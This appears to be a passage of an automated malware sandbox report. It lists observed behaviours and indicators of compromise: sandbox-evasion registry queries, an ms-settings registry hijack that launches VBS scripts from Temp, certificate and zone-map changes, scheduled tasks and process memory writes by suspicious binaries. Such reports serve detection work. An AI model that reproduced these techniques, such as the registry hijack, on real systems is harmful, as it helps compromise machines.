Adversaries may check for Internet connectivity on compromised systems.
pid Process 5944 PING.EXE 8672 PING.EXE -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tik-tok-1.0.5.0-installer_iPXA-F1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 procexp64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz procexp64.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3456 wmic.exe 7152 wmic.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 5712 net.exe 232 net.exe -
Enumerates system info in registry 2 TTPs 15 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 6692 ipconfig.exe -
Kills process with taskkill 3 IoCs
pid Process 1920 taskkill.exe 6272 taskkill.exe 8008 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe -
Modifies registry class 37 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\3726.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2599.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings firefox.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2997.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ 7zFM.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ 7zFM.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\SysinternalsSuite.zip:Zone.Identifier firefox.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8672 PING.EXE 5944 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8296 schtasks.exe 4024 schtasks.exe 8416 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 1092 URGMwM6.exe 1092 URGMwM6.exe 1092 URGMwM6.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2152 msedge.exe 2152 msedge.exe 2684 procexp64.exe 2684 procexp64.exe 2156 msedge.exe 2156 msedge.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 744 7zFM.exe 2684 procexp64.exe 744 7zFM.exe 2684 procexp64.exe 744 7zFM.exe 2684 procexp64.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 2684 procexp64.exe 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 644 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 2684 procexp64.exe 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 644 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2984 chrome.exe 2984 chrome.exe 2984 chrome.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2984 chrome.exe 2984 chrome.exe 2984 chrome.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 5016 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2984 chrome.exe 2984 chrome.exe 2984 chrome.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 8312 msedge.exe 4176 msedge.exe 4176 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 744 7zFM.exe Token: 35 744 7zFM.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeSecurityPrivilege 744 7zFM.exe Token: SeDebugPrivilege 2684 procexp64.exe Token: SeBackupPrivilege 2684 procexp64.exe Token: SeSecurityPrivilege 2684 procexp64.exe Token: SeLoadDriverPrivilege 2684 procexp64.exe Token: SeShutdownPrivilege 2684 procexp64.exe Token: SeCreatePagefilePrivilege 2684 procexp64.exe Token: SeShutdownPrivilege 2684 procexp64.exe Token: SeCreatePagefilePrivilege 2684 procexp64.exe Token: SeDebugPrivilege 2684 procexp64.exe Token: SeImpersonatePrivilege 2684 procexp64.exe Token: SeSecurityPrivilege 2684 procexp64.exe Token: SeDebugPrivilege 2684 procexp64.exe Token: SeBackupPrivilege 2684 procexp64.exe Token: SeRestorePrivilege 2684 procexp64.exe Token: SeDebugPrivilege 2684 procexp64.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 5932 4363463463464363463463463.exe Token: SeDebugPrivilege 1732 firefox.exe Token: SeDebugPrivilege 5620 New Text Document mod.exe Token: SeDebugPrivilege 6212 gvndxfghs.exe Token: SeDebugPrivilege 3540 Winsvc.exe Token: SeDebugPrivilege 1092 URGMwM6.exe Token: SeLockMemoryPrivilege 5208 xblkpfZ8Y4.exe Token: SeLockMemoryPrivilege 5208 xblkpfZ8Y4.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeDebugPrivilege 7020 3245516675.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeDebugPrivilege 3540 Winsvc.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeShutdownPrivilege 2984 chrome.exe Token: SeCreatePagefilePrivilege 2984 chrome.exe Token: SeDebugPrivilege 6624 InstallUtil.exe Token: SeDebugPrivilege 9184 tasklist.exe Token: SeDebugPrivilege 6984 powershell.exe Token: SeIncreaseQuotaPrivilege 6984 powershell.exe Token: SeSecurityPrivilege 6984 powershell.exe Token: SeTakeOwnershipPrivilege 6984 powershell.exe Token: SeLoadDriverPrivilege 6984 powershell.exe Token: SeSystemProfilePrivilege 6984 powershell.exe Token: SeSystemtimePrivilege 6984 powershell.exe Token: SeProfSingleProcessPrivilege 6984 powershell.exe Token: SeIncBasePriorityPrivilege 6984 powershell.exe Token: SeCreatePagefilePrivilege 6984 powershell.exe Token: SeBackupPrivilege 6984 powershell.exe Token: SeRestorePrivilege 6984 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 744 7zFM.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 744 7zFM.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2156 msedge.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe 2684 procexp64.exe -
Suspicious use of SetWindowsHookEx 42 IoCs
pid Process 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 2684 procexp64.exe 2044 pei.exe 5284 hack1226.exe 5968 tdrpload.exe 704 1352515001.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 2684 procexp64.exe 8824 OpenWith.exe 1544 9758xBqgE1azKnB.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 2684 procexp64.exe 2044 pei.exe 5284 hack1226.exe 5968 tdrpload.exe 704 1352515001.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 2684 procexp64.exe 8824 OpenWith.exe 1544 9758xBqgE1azKnB.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 1732 firefox.exe 2684 procexp64.exe 2044 pei.exe 5284 hack1226.exe 5968 tdrpload.exe 704 1352515001.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 2684 procexp64.exe 8824 OpenWith.exe 1544 9758xBqgE1azKnB.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 3528 wrote to memory of 1732 3528 firefox.exe 80 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 1828 1732 firefox.exe 81 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 